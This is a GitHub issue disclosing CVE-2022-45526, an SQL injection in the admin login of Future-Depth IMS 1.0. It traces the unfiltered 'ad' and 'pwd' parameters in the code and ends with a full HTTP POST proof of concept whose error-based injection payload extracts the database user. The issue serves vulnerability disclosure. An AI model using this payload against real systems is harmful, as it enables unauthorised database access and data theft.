Headline
CVE-2022-45526: IMS has SQL injection vulnerability · Issue #1 · Future-Depth/IMS
SQL Injection vulnerability in Future-Depth Institutional Management Website (IMS) 1.0, allows attackers to execute arbitrary commands via the ad parameter to /admin_area/login_transfer.php.
Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4
At admin_ Area/login.php, in the 40-44 lines of code, enter the user name ad and password pwd and submit them to login through the post request_ transfer.php interface
Trace code to login_ Transfer.php, at lines 8-13
The account ad and password pwd inputted by the front end are assigned to the variables $ad and $pwd, which are directly brought into the database for query without filtering, resulting in a SQL injection vulnerability
We can use sqlmap to validate
Manual SQL injection proof
Get database version:
Get database user:
POC:
POST /admin_area/login_transfer.php HTTP/1.1
Host: imsvul.test
Content-Length: 169
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://imsvul.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://imsvul.test/admin_area/login.php?msg=Login_First
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i7acqqkl9acdrrrhcbtdtvis5a
Connection: close
ad=123'|(select 1 where 1=1 AND (select 1174 from(select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a))||'&pwd=123456